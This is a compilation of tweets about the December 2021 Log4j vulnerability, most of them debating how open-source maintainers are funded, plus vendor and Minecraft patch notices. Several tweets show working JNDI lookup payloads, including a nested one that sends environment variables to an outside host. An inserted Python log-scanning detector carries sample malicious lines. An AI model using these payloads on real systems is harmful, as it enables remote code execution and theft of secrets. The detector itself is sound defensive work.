Watching this log4j bug metastasize, I’m seeing people ask why industry doesn’t fund open source. I don’t have a great answer, but I have some thoughts following the experience with Heartbleed in ‘14. 1/
— Matthew Green (@matthew_d_green) December 11, 2021
I get about $2,000 a month from GitHub sponsors. Let’s talk about funding for open source projects, specifically my thoughts for @tldraw. https://t.co/1Fi5tzWsgZ
— Steve Ruiz (@steveruizok) December 12, 2021
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Millions of $$$ are floating around bug bounties which do very little in fixing the underlying core issues we face.
— Andrea Barisani (@AndreaBarisani) December 12, 2021
Yet critical dependencies which are everywhere struggle in getting adequate backing, only hostility when they break.
Pay maintainers, pay proper security audits. https://t.co/VT7XJK7dJI
Okta RADIUS and MFA server are vulnerable and exploitable and need upgrading ASAP https://t.co/WvojrhBQRA pic.twitter.com/RZ7wJCbc7F
— Kevin Beaumont (@GossiTheDog) December 11, 2021
No one is paying the log4j2 maintainers!?
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021
There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? https://t.co/JXimIQLxw5
Open Source needs to grow the hell up. Yesterday. https://t.co/tQpITt8vn3
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
— Tanner Barnes (@_StaticFlow_) December 10, 2021
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!
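A defender-side detector for the nestable lookup syntax described in the tweet above, written here as an added example; it is not code from any of the quoted accounts or from the Log4j project. It walks each log line with a small stack so that a `${...}` nested inside another `${...}` is reported with its depth, and it flags lines whose lookups reference the `jndi:` resolver or that nest at all. The log lines, the `attacker.example` hostname and the function names are constructed for this example.

```python
"""Scan log lines for Log4j-style ${...} lookups, including nested ones.

Added example, not code from the tweets quoted on this page. All log lines
below are constructed; hostnames use the reserved .example TLD.
"""
from dataclasses import dataclass

# Constructed sample log lines: one benign request, one direct jndi lookup,
# one nested lookup of the kind the tweet describes, and one harmless template.
LOG_LINES = [
    '2021-12-10 12:00:01 INFO  GET /index.html ua="Mozilla/5.0"',
    '2021-12-10 12:00:02 INFO  GET /login ua="${jndi:ldap://attacker.example/a}"',
    '2021-12-10 12:00:03 INFO  chat msg="${jndi:ldap://${env:USER}.attacker.example/a}"',
    '2021-12-10 12:00:04 INFO  template price=${amount} currency=USD',
]


@dataclass
class Lookup:
    text: str   # the full "${...}" span, including any nested spans inside it
    depth: int  # 1 for a top-level lookup, 2 for one nested inside another, ...


def find_lookups(line: str) -> list[Lookup]:
    """Match each "${" with its closing "}" using a stack so nesting is tracked.

    A regex such as \\$\\{[^}]*\\} stops at the first "}" and therefore
    mis-parses the nested form; the stack yields the correct outer span.
    """
    stack: list[int] = []
    found: list[Lookup] = []
    i = 0
    while i < len(line):
        if line.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if line[i] == "}" and stack:
            start = stack.pop()
            # Depth = number of lookups still open around this one, plus one.
            found.append(Lookup(line[start:i + 1], len(stack) + 1))
        i += 1
    return found


def max_depth(line: str) -> int:
    """Deepest nesting level seen on the line (0 when there are no lookups)."""
    return max((lk.depth for lk in find_lookups(line)), default=0)


def is_suspicious(line: str) -> bool:
    """True if any lookup on the line references the jndi: resolver."""
    return any("jndi:" in lk.text.lower() for lk in find_lookups(line))


def triage(lines: list[str]) -> list[dict]:
    """Return one finding per flagged line, with the reasons to review it."""
    findings = []
    for n, line in enumerate(lines, start=1):
        reasons = []
        if is_suspicious(line):
            reasons.append("jndi lookup in logged data")
        if max_depth(line) >= 2:
            reasons.append("nested lookup (can expand env/system values into the request)")
        if reasons:
            findings.append({"line_no": n, "reasons": reasons, "line": line})
    return findings


if __name__ == "__main__":
    for f in triage(LOG_LINES):
        print(f["line_no"], "; ".join(f["reasons"]))
```

Run it as a script to print the flagged line numbers and reasons, or import `triage` into a log-review job. This is triage of data that has already been logged; it does not replace upgrading Log4j or disabling the lookup feature.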
This is going to sound blunt, but it's a distribution problem not a funding problem. $ is easy.
— Dan Lorenc (@lorenc_dan) December 12, 2021
Corporations have budget and are willing to spend, but it takes too much time. Finding projects that need help and maintainers willing to help in exchange for money is hard. pic.twitter.com/mFkOoOVYXn
Interesting that "supply chain vulnerabilities" have become a crisis in both the physical world and the web (open source library dependencies) at the same time.
— Chris Anderson (@chr1sa) December 12, 2021
The perpetual pendulum between distributed and centralized will now swing back to the latter https://t.co/GnalKfmBrC
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://t.co/2pjh7FG7h4
— Catalin Cimpanu (@campuscodi) December 11, 2021
Great post — charity-based open source is very naive and unrealistic, if only because it's 100x more complicated for a business to pay someone for nothing than it is for something. https://t.co/0YsYcMXifk pic.twitter.com/34r6ofYnNm
— Adam Wathan (@adamwathan) December 11, 2021
Log4j recap
— Kevin Beaumont (@GossiTheDog) December 12, 2021
- two random unpaid folk maintain the code
- a random requested the vuln/feature in 2013
- major IT and security vendors rely on that code
- problem was publicised by teens in Minecraft video game
- scope of problem still unclear days later pic.twitter.com/dK7RTNCV3b
I love when people share ideas like this, especially when they're backed by current events #opensource https://t.co/p1lTYIxJRd
— Joshua Powell (@joshuapowell_io) December 11, 2021
but the real answer is crypto... totally right problem to identify but invoicing companies for maintaining open source software is lol. https://t.co/UkniROBq6J
— sam lessin (@lessin) December 12, 2021
DAOs were literally born to solve this
— jjacopo.eth (@jj_ranalli) December 12, 2021
Thinking of building a tool for DAOs to fund open source projects on @github and handle treasury through @juiceboxETH
Someone stop me (or join me) https://t.co/0PZ94tuk8N
The world would be so much better off if maintaining open source software were a viable profession. One day…? https://t.co/b3tcTGiBIe
— R. Miles McCain (@MilesMcCain) December 11, 2021
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. https://t.co/W2u6AcBUM8
— Volkan Yazıcı (@yazicivo) December 10, 2021
Open source maintainer as a career path. There are just a few companies who understand the benefits of funding open source development, and it’s challenging to keep explaining that to others. Luckily I was able to find some already. Thanks for that! https://t.co/PPIV0otdTj
— Jan Žák (@zakjan) December 12, 2021
Open source spent the 1990s trying to convince corporations they could trust it, the 2000s delighted at its success in corporations, the 2010s begging corporations to help pay for the enormous maintenance costs being shouldered by random individuals. https://t.co/UR0VugGK12
— Laurie Voss (@seldo) December 12, 2021
As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://t.co/7IZadI4fy6
— Matthew Green (@matthew_d_green) December 11, 2021
This is well-intentioned, but saying "companies are in the business of getting what they need—by paying invoices" shows incredible naivety about how bad companies are at paying their invoices https://t.co/vVVQb6zaJD
— Andrew White (@pixeltrix) December 11, 2021
Once again, open source software maintained by a few people in their spare time, and used by a lot of companies in their projects, has a big vulnerability.
— Romain Rastel (@lets4r) December 12, 2021
When will companies understand that it's in their interest to support OSS financially? https://t.co/DA6hJCvOND
Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers. https://t.co/AQ7t86o8bg
— ☣purely editorial☣ (@chromatic_x) December 11, 2021
Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://t.co/i8ANhX9IMn pic.twitter.com/70yfUUgIBG
— Matt Ficke (@mattficke) December 11, 2021
When Heartbleed dropped, it was very similar to log4j: an underfunded OSS project (OpenSSL) that nobody thought about, but was *everywhere*. It took everyone by surprise, and even woke industry up. The result was a surge of funding. 2/
— Matthew Green (@matthew_d_green) December 11, 2021
We all agree the status quo is unsustainable.
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 11, 2021
Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession.
The thing is, companies need it as much as maintainers do. https://t.co/RK26lKGg3h
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.
— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021
"I work on Log4j in my spare time"
"always dreamed of working on open source full time"
"3 sponsors are funding @rgoers's work: Michael, Glenn, Matt"
People, what are we doing. pic.twitter.com/2hAxUWCjuC
When people say "you didn’t build that" they’re not just talking about how highways and public education contribute to corporate success. They’re also talking about this. Open source is the vital foundation of nearly every corporate software asset. And it gets no respect. https://t.co/elRM7dgRac
— Love In The Time Of Covid (@JimJ_candid) December 11, 2021
Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition.
— Minecraft (@Minecraft) December 10, 2021
The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify. https://t.co/4Ji8nsvpHf
This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://t.co/omf3ijiNJY
— Ondřej Surý (@oerdnj) December 11, 2021
It takes lack of attention. In Heartbleed, someone merged a dumb feature quickly without doing careful code review.
— Matthew Green (@matthew_d_green) December 11, 2021
In log4j someone merged a dumb feature that any security expert would have recoiled at.
„This person's spare time passion project is responsible for half of the internet working the way it should. Vulnerable companies to this issue included Apple, Google, my cell phone carrier and everyone that uses JavaEE in its default configuration.“ https://t.co/ISp5UqJyPt
— Andreas Baumgartner (@bmgnrs) December 12, 2021
New blog post in which I touch upon the discourse regarding how open source maintainers can get paid.
— Nadim Kobeissi (@kaepora) December 12, 2021
I'll spare you my efforts to make my tweet more flashy, viral, have a strong hook, or whatever it is I'm supposed to do for metrics. https://t.co/qf2oZpdlkw
On Paying Open Source Maintainers
— Lobsters (@lobsters) December 12, 2021
by @kaepora https://t.co/LTOiIwM4H4 #programming https://t.co/hlW2ktfpIU
“It's a design failure of catastrophic proportions.”
— Follow Light within (@kevskewl) December 12, 2021
Free Wortley, LunaSec https://t.co/0b2mvbzt4t
In case you’re worried seeing bits & pieces like this, here’s a civilian-level update on the …catastrophic? #log4j Java vulnerability: https://t.co/F6Lfgk8I0C https://t.co/9HWYketppZ
— LizNeeley (@LizNeeley) December 11, 2021
A Log4J Vulnerability Has Set the Internet 'On Fire' | WIRED https://t.co/MT0tcOz6F8
— Christian Reilly (@reillyusa) December 12, 2021
#tech #technology #IT #startup #startups #cloud #cloudsecurity #data #datascience #hacking #innovation #digitaltransformation #cyberattacks #ransomware #wfh #iot #fintech #security #logging #5g A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/L6AS4vkVjL
— Anand Aggala (@aggala) December 12, 2021
OMG, all those #Minecraft servers being vulnerable to #log4j
— Mirko Ross (@mirko_ross) December 12, 2021
"Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function."
https://t.co/KB1cNVszzK #Log4Shell #log4jRCE #log4j2 #cybersecurity
A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/oVGSS7ABwT #tech #feedly #CES2022 @AffinityInitia1 @jblefevre60 @kalydeoo @sallyeaves @BetaMoroney @DeepLearn007 @Xbond49 @Ym78200 @ipfconline1 @IanLJones98 @Hana_ElSayyed @AmitChampaneri1 @ravidugh @Khulood_Almani
— Nicolas Babin #CES2022 (@Nicochan33) December 11, 2021
Professional maintainers: a wake-up call https://t.co/q7UsXUWOty
— Bill Bennett (@billbennettnz) December 12, 2021
If you’re running VMware products in your environment, you are impacted by the Log4j vulnerability. Check out this KB for workarounds/mitigations for many VMware products: https://t.co/t01clQJLKO
— Sean Massey #blacklivesmatter (@seanpmassey) December 11, 2021
VMware Response to Apache Log4j Remote Code Execution Vulnerability
— Sami Laiho (@samilaiho) December 12, 2021
(CVE-2021-44228) https://t.co/OkgksLoQpW
Classification: Critical, Solution: Update, Exploit: Wild
Make sure to update to the latest @Runecast Analyzer (released today). It discovers the critical vulnerabilities described in VMSA-2021-0028 #vCenter #Horizon #NSX #security #log4j CVE-2021-44228 https://t.co/sngsxfirTG
— Stanimir Markov (@sferk) December 12, 2021
VMware has, for now, updated 32 products for the log4j vulnerability https://t.co/OEEhN4OCsK
— 高梨陣平 (@jingbay) December 11, 2021
It's funny that the end of the list says "we may add more" :-)
VMware advisory, I couldn’t fit the products under investigation on one screenshot https://t.co/HvUJUUR2g8 pic.twitter.com/OIPXIYM1ru
— Kevin Beaumont (@GossiTheDog) December 11, 2021
Something huge has come out (I lack the words for it)
— つじ (@st_mouton) December 12, 2021
Horizon, vCenter, vRealize Operations and a whole lot more https://t.co/M1r4PuQ7fB
Workarounds and patches are available for multiple VMware products that are exploitable by the log4j2 issue — including vCenter, Horizon and the Unified Access Gateway.
— Michael Stanclift (@vmstan) December 11, 2021
Implement. Now. https://t.co/rogNxNgUIx
Perfect 10.0 security vulnerability found in most VMware products. Please spread the word to make everyone aware.
— Russell Hamker (@butch7903) December 11, 2021
VMSA-2021-0028 - VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Info: https://t.co/y3iiAOdhwq #vExpert #log4j #VMUG
Log4j bug is like a domino ... https://t.co/Qz3o3RCQ0b
— Astr0 Baby (@astr0baby) December 11, 2021
The log4j mess exemplifies what I consider the core flaw in the open source ecosystem. People in the industry have now been conditioned to expect so many things for free, but also expect for themselves to get paid. It's hypocritical and unstable. https://t.co/WWf4h9B6VG pic.twitter.com/uWHqZMTOgG
— Billy Hollis (@billyhollis) December 12, 2021
How do you fix this problem? You introduce licensing that requires you to pay money when you build commercial tooling on top of OSS. It's actually a solved problem but despised by so many. https://t.co/cv0Gcc5q2Y
— Hadi Hariri (@hhariri) December 12, 2021
If you use software made by others in their spare time and find it useful, pay them. This should not be a controversial opinion. https://t.co/XDMFIcTlsW
— @mikko (@mikko) December 11, 2021
"Open Source" is Broken https://t.co/vuyGH8szWt #rant
— Xe (@theprincessxena) December 11, 2021
that's why we need DAO, someone built the internet, but he got nothing https://t.co/1Y22Ec0KOf
— Panda (@hellopandadao) December 12, 2021
Open source is broken? https://t.co/JfgTZrfOom pic.twitter.com/dMqGH82w19
— vishwesh.eth (@vishweshji) December 12, 2021
Mitigations have been announced by the official Minecraft team. See here for details on how to apply the mitigations for each version. https://t.co/CvSIziPrEP
— SaziumR (@SaziumR) December 11, 2021
PSA Time Folks: https://t.co/tgziGl5mWN
— Zed A. Shaw, Writer (@lzsthw) December 12, 2021
If you run a Minecraft server or the client (Java edition) then you need to read this and do some work. The recent log4j vulnerability is exploitable and will cause you pain. https://t.co/pmkqSYN4gZ
This is a very serious exploit! The Mojang team have done an amazing job at responding to the issue, and it is to the largest extent resolved. You can read up more about it here: https://t.co/82fcLeafbd
— Gegy (@gegy1000) December 11, 2021
Here's an informational page about the vulnerability and how to deal with it on both client and server side for all versions: https://t.co/GykKstyxgp
— slicedlime (@slicedlime) December 10, 2021
If your kids play Minecraft, make sure they upgrade to 1.18.1 because their box can get hacked with a chat message. https://t.co/MdlZvctfOe
— Heath Borders (@heathborders) December 11, 2021